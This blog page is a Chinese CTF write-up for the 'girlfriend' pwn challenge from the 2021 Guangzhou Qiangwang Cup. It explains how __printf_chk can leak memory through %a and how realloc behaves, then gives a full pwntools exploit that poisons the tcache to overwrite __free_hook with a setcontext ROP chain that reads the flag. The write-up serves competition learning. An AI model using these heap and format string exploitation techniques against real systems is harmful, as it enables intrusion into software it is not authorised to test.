<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="WP," />










<meta name="description" content="girlfriend前置FORTIFY2.27版本 123456789➜  pwn1 checksec girlfriend [*] &amp;#x27;&#x2F;home&#x2F;a1&#x2F;广州强网杯&#x2F;pwn1&#x2F;girlfriend&amp;#x27;    Arch:     amd64-64-little    RELRO:    Full RELRO    Stack:    Canary found    NX:">
<meta property="og:type" content="article">
<meta property="og:title" content="2021广州强网杯">
<meta property="og:url" content="http://example.com/2021/10/20/2021%E5%B9%BF%E5%B7%9E%E5%BC%BA%E7%BD%91%E6%9D%AF/index.html">
<meta property="og:site_name" content="Tm0tfl">
<meta property="og:description" content="girlfriend前置FORTIFY2.27版本 123456789➜  pwn1 checksec girlfriend [*] &amp;#x27;&#x2F;home&#x2F;a1&#x2F;广州强网杯&#x2F;pwn1&#x2F;girlfriend&amp;#x27;    Arch:     amd64-64-little    RELRO:    Full RELRO    Stack:    Canary found    NX:">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2021-10-20T02:17:12.000Z">
<meta property="article:modified_time" content="2021-11-26T02:33:04.937Z">
<meta property="article:author" content="Tm0tfl">
<meta property="article:tag" content="WP">
<meta name="twitter:card" content="summary">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://example.com/2021/10/20/2021广州强网杯/"/>





  <title>2021广州强网杯 | Tm0tfl</title>
  








<meta name="generator" content="Hexo 5.4.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Tm0tfl</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            About
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/10/20/2021%E5%B9%BF%E5%B7%9E%E5%BC%BA%E7%BD%91%E6%9D%AF/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="http://qvb75z5z6.hn-bkt.clouddn.com/1605841888100229.jpeg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Tm0tfl">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">2021广州强网杯</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2021-10-20T10:17:12+08:00">
                2021-10-20
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/" itemprop="url" rel="index">
                    <span itemprop="name">CTF</span>
                  </a>
                </span>

                
                
                  , 
                
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/WP/" itemprop="url" rel="index">
                    <span itemprop="name">WP</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="girlfriend"><a href="#girlfriend" class="headerlink" title="girlfriend"></a>girlfriend</h1><h2 id="前置"><a href="#前置" class="headerlink" title="前置"></a>前置</h2><h3 id="FORTIFY"><a href="#FORTIFY" class="headerlink" title="FORTIFY"></a>FORTIFY</h3><p>2.27版本</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">➜  pwn1 checksec girlfriend </span><br><span class="line">[*] &#x27;/home/a1/广州强网杯/pwn1/girlfriend&#x27;</span><br><span class="line">    Arch:     amd64-64-little</span><br><span class="line">    RELRO:    Full RELRO</span><br><span class="line">    Stack:    Canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      PIE enabled</span><br><span class="line">    RUNPATH:  b&#x27;/home/a1/glibc-all-in-one/libs/2.27-3ubuntu1.4_amd64&#x27;</span><br><span class="line">    FORTIFY:  Enabled</span><br></pre></td></tr></table></figure>
<p>其中<code>FORTIFY</code>是一种检测缓冲区溢出的机制，采用编译选项<code>-D_FORTIFY_SOURCE=2 (-D_FORTIFY_SOURCE=1)</code>可以启用。适用情形是程序采用大量的字符串或者内存操作函数，如<code>memcpy，memset，strcpy，strncpy，strcat，strncat，sprintf，snprintf，vsprintf，vsnprintf，gets</code>以及宽字符的变体。<br><code>gcc -D_FORTIFY_SOURCE=1</code>，仅仅会在编译的时候进行检查。<br><code>gcc -D_FORTIFY_SOURCE=2</code>，会在程序运行的时候进行检查，如果检查到缓冲区溢出就终止程序。</p>
<h3 id="printf-chk"><a href="#printf-chk" class="headerlink" title="__printf_chk"></a>__printf_chk</h3><p><code>__printf_chk()</code>函数，是在开启<code>FORTIFY</code>之后，编译器进行优化的。</p>
<ol>
<li>在<code>__printf_chk()</code>中使用位置参数的时候，必须使用范围内所有的参数，也就是如果要输出<code>%4$p</code>，必须有<code>%1$p, %2$p, %3$p</code></li>
<li>包含<code>%n</code>的格式化字符串不能位于程序内存中的可写地址</li>
</ol>
<p>但是可以用<code>%a</code>来进行泄露，在调用<code>__printf_chk()</code>函数之前，会先把参数中浮点数的个数存到<code>al</code>寄存器中。当<code>al</code>不为<code>0</code>的时候，会把所有的<code>xmm</code>寄存器压入栈中。格式化字符串中<code>al=0</code>，就会输出栈上的垃圾数据。</p>
<p><code>%a</code>输出使用的是浮点数、十六进制数字和p-计数法，就是csapp上讲的那种？</p>
<h3 id="realloc"><a href="#realloc" class="headerlink" title="realloc"></a>realloc</h3><p><code>void* realloc (void* ptr, size_t size);</code></p>
<ol>
<li>如果<code>newsize = 0</code>，就相当于<code>free</code>，下面利用这个性质可以从<code>tcache</code>中申请堆块。</li>
<li>如果<code>newsize &lt; oldsize</code>，就会进行切割，并且把后半部分<code>free</code>掉。如果是剩余小于<code>MINSIZE</code>，就维持原样。</li>
<li>如果<code>newsize  = oldsize</code>，不变化</li>
<li>如果<code>newsize &gt; oldsize</code>，会倾向于扩展，如果没法扩展就<code>free,malloc</code></li>
</ol>
<h2 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h2><p>题目中有花指令，手动<code>nop</code>掉的。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">unsigned</span> __int64 <span class="title">sub_EA6</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">char</span> buf[<span class="number">24</span>]; <span class="comment">// [rsp+0h] [rbp-20h] BYREF</span></span><br><span class="line">  <span class="keyword">unsigned</span> __int64 v2; <span class="comment">// [rsp+18h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v2 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;why ? reason&quot;</span>);</span><br><span class="line">  read(<span class="number">0</span>, buf, <span class="number">5uLL</span>);</span><br><span class="line">  __printf_chk(<span class="number">1LL</span>, buf, <span class="number">0LL</span>, <span class="number">0LL</span>, <span class="number">0LL</span>, <span class="number">0LL</span>); <span class="comment">//格式化字符串漏洞__printf_chk()</span></span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;new a grilfriend&quot;</span>);</span><br><span class="line">  sub_E1D();</span><br><span class="line">  <span class="keyword">return</span> __readfsqword(<span class="number">0x28</span>u) ^ v2;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>可以泄露<code>libc</code>。</p>
<p>还有一次<code>show</code>的机会，可以用来泄露<code>heapbase</code>，可以说是白给了。</p>
<p>程序中都是使用<code>realloc</code>来进行操作，在<code>create</code>的时候存在<code>offbyone</code>漏洞，可以通过构造来造成堆块重叠，修改<code>tcache</code>中的<code>fd</code>指针为<code>freehook</code>为<code>setcontext</code>，进行<code>orw</code>。</p>
<h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">debug</span>(<span class="params">content</span>):</span> </span><br><span class="line">    gdb.attach(p, content);</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">create</span>(<span class="params">size, content</span>):</span> </span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;&gt;&gt;&#x27;</span>, <span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;size&#x27;</span>, <span class="built_in">str</span>(size))</span><br><span class="line">    p.sendafter(<span class="string">&#x27;data&#x27;</span>, content)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span>():</span> </span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;&gt;&gt;&#x27;</span>, <span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;size&#x27;</span>, <span class="string">&#x27;0&#x27;</span>)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>():</span> </span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;&gt;&gt;&#x27;</span>, <span class="string">&#x27;4&#x27;</span>)</span><br><span class="line"></span><br><span class="line">context.terminal = [<span class="string">&#x27;tmux&#x27;</span>, <span class="string">&#x27;splitw&#x27;</span>, <span class="string">&#x27;-h&#x27;</span>]</span><br><span class="line">context(log_level = <span class="string">&#x27;debug&#x27;</span>, arch = <span class="string">&#x27;amd64&#x27;</span>, os = <span class="string">&#x27;linux&#x27;</span>)</span><br><span class="line">p = process(<span class="string">&#x27;./girlfriend&#x27;</span>)</span><br><span class="line">elf = ELF(<span class="string">&#x27;./girlfriend&#x27;</span>)</span><br><span class="line">libc = ELF(<span class="string">&#x27;./libc.so.6&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># debug(&#x27;b *$rebase(0xF17)&#x27;)</span></span><br><span class="line">p.recvuntil(<span class="string">&#x27;?&#x27;</span>)</span><br><span class="line">p.sendline(<span class="built_in">str</span>(<span class="number">0x4E</span>))</span><br><span class="line">p.recvuntil(<span class="string">&#x27;reason&#x27;</span>)</span><br><span class="line">p.send(<span class="string">&#x27;%a%a&#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;0x0.&#x27;</span>)</span><br><span class="line">libcbase = <span class="built_in">int</span>(p.recv(<span class="number">13</span>), <span class="number">16</span>) - <span class="number">0x3ec7e3</span></span><br><span class="line">log.success(<span class="string">&#x27;libcbase: &#x27;</span> + <span class="built_in">str</span>(<span class="built_in">hex</span>(libcbase)))</span><br><span class="line">p.sendlineafter(<span class="string">&#x27;&gt;&gt;&#x27;</span>, <span class="string">&#x27;3&#x27;</span>)</span><br><span class="line"></span><br><span class="line">freehook = libcbase + libc.symbols[<span class="string">&#x27;__free_hook&#x27;</span>]</span><br><span class="line">setcontext = libcbase + libc.symbols[<span class="string">&#x27;setcontext&#x27;</span>]</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">&#x27;?&#x27;</span>)</span><br><span class="line">p.sendline(<span class="built_in">str</span>(<span class="number">0x59</span>))</span><br><span class="line"><span class="comment"># create(0x100, &#x27;a&#x27;)</span></span><br><span class="line"><span class="comment"># create(0x30, &#x27;a&#x27;)</span></span><br><span class="line"><span class="comment"># create(0x50, &#x27;a&#x27;)</span></span><br><span class="line">create(<span class="number">0x2f8</span>, <span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">create(<span class="number">0x120</span>, <span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">delete()</span><br><span class="line">create(<span class="number">0x2f8</span>, <span class="string">&#x27;a&#x27;</span>*(<span class="number">0x1d0</span>+<span class="number">0x10</span>) + p64(<span class="number">0</span>)+p64(<span class="number">0x111</span>)) <span class="comment">#chunk1+2</span></span><br><span class="line">show()</span><br><span class="line">heapbase = u64(p.recvuntil(<span class="string">&#x27;\n&#x27;</span>, drop = <span class="literal">True</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>, <span class="string">&#x27;\x00&#x27;</span>)) - <span class="number">0x1480</span></span><br><span class="line">log.success(<span class="string">&#x27;heapbase: &#x27;</span> + <span class="built_in">str</span>(<span class="built_in">hex</span>(heapbase)))</span><br><span class="line">create(<span class="number">0x1c8</span>, <span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">create(<span class="number">0x198</span>, <span class="string">&#x27;a&#x27;</span>*<span class="number">0x198</span> + <span class="string">&#x27;\x51&#x27;</span>)</span><br><span class="line">delete()</span><br><span class="line">create(<span class="number">0x28</span>, <span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">delete()</span><br><span class="line">create(<span class="number">0x40</span>, <span class="string">&#x27;a&#x27;</span>*<span class="number">0x20</span> + p64(<span class="number">0</span>) + p64(<span class="number">0x131</span>) + p64(freehook))</span><br><span class="line">delete()</span><br><span class="line">create(<span class="number">0x120</span>, <span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">create(<span class="number">0x10</span>, <span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">delete()</span><br><span class="line"></span><br><span class="line">poprdi = libcbase + <span class="number">0x00000000000215bf</span></span><br><span class="line">poprsi = libcbase + <span class="number">0x0000000000023eea</span></span><br><span class="line">poprdx = libcbase + <span class="number">0x0000000000001b96</span></span><br><span class="line">ret = libcbase + <span class="number">0x00000000000008aa</span></span><br><span class="line">O = libcbase + libc.symbols[<span class="string">&#x27;open&#x27;</span>]</span><br><span class="line">R = libcbase + libc.symbols[<span class="string">&#x27;read&#x27;</span>]</span><br><span class="line">W = libcbase + libc.symbols[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line"></span><br><span class="line">filename = freehook+<span class="number">0xb0</span></span><br><span class="line">payload = p64(setcontext+<span class="number">53</span>)</span><br><span class="line">payload += flat(poprdi, filename, poprsi, <span class="number">0</span>, O)</span><br><span class="line">payload += flat(poprdi, <span class="number">3</span>, poprsi, heapbase+<span class="number">0x250</span>, poprdx, <span class="number">0x40</span>, R)</span><br><span class="line">payload += flat(poprdi, <span class="number">1</span>, W)</span><br><span class="line">payload = payload.ljust(<span class="number">0xa0</span>, <span class="string">&#x27;\x00&#x27;</span>)</span><br><span class="line">payload += p64(freehook+<span class="number">0x8</span>) + p64(ret)</span><br><span class="line">payload += <span class="string">&#x27;flag&#x27;</span> + <span class="string">&#x27;\x00&#x27;</span></span><br><span class="line">create(<span class="number">0x120</span>, payload)</span><br><span class="line">delete()</span><br><span class="line"><span class="comment"># debug(&#x27;b main&#x27;)</span></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="T-S"><a href="#T-S" class="headerlink" title="T_S"></a>T_S</h1><p>前面有一个<code>2.31offbynull</code>说过了。</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/WP/" rel="tag"># WP</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2021/10/19/2.31-offbynull/" rel="next" title="2.31-offbynull">
                <i class="fa fa-chevron-left"></i> 2.31-offbynull
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2021/10/22/2.31-orw/" rel="prev" title="2.31-orw">
                2.31-orw <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="http://qvb75z5z6.hn-bkt.clouddn.com/1605841888100229.jpeg"
                alt="" />
            
              <p class="site-author-name" itemprop="name"></p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/%7C%7C%20archive">
              
                  <span class="site-state-item-count">17</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">8</span>
                  <span class="site-state-item-name">categories</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/xxy1126" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:1335926819@qq.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#girlfriend"><span class="nav-number">1.</span> <span class="nav-text">girlfriend</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%89%8D%E7%BD%AE"><span class="nav-number">1.1.</span> <span class="nav-text">前置</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#FORTIFY"><span class="nav-number">1.1.1.</span> <span class="nav-text">FORTIFY</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#printf-chk"><span class="nav-number">1.1.2.</span> <span class="nav-text">__printf_chk</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#realloc"><span class="nav-number">1.1.3.</span> <span class="nav-text">realloc</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%86%E6%9E%90"><span class="nav-number">1.2.</span> <span class="nav-text">分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#exp"><span class="nav-number">1.3.</span> <span class="nav-text">exp</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#T-S"><span class="nav-number">2.</span> <span class="nav-text">T_S</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Tm0tfl</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  
  
    <script type="text/x-mathjax-config">
      MathJax.Hub.Config({
        tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
        }
      });
    </script>

    <script type="text/x-mathjax-config">
      MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for (i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
        }
      });
    </script>
    <script type="text/javascript" src="//cdn.bootcss.com/mathjax/2.7.1/latest.js?config=TeX-AMS-MML_HTMLorMML"></script>
  


  

  

</body>
</html>
